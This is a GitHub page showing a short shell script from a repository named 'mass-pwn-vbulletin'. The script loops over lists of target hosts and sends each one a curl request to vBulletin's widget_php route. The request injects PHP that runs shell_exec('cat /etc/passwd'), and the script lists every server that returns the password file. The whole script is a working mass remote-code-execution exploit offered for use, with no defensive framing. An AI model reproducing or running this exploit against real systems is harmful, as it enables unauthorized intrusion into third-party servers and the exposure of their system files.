forked from c002/mass-pwn-vbulletin
-
Notifications
You must be signed in to change notification settings - Fork 0
/
vbulletin-scan.sh
17 lines (16 loc) · 915 Bytes
/
vbulletin-scan.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
echo "EXPLOITING TARGETS ON PORT 443..."
echo "----------------"
count=1
cat vbullet-443 | while read -r p; do
echo -ne "$count / `cat vbullet-443 | wc -l` - $p "\\r
curl https://$p/index.php?routestring=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo shell_exec('cat /etc/passwd');exit;" | grep -w "root:x" > /dev/null && echo "https://$p "
(( count++ ))
done
echo "EXPLOITING TARGETS ON PORT 80..."
echo "----------------"
count=1
cat vbullet-80 | while read -r p; do
echo -ne "$count / `cat vbullet-80 | wc -l` - $p "\\r
curl http://$p/index.php?routestring=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo shell_exec('cat /etc/passwd');exit;" | grep -w "root:x" > /dev/null && echo "http://$p "
(( count++ ))
done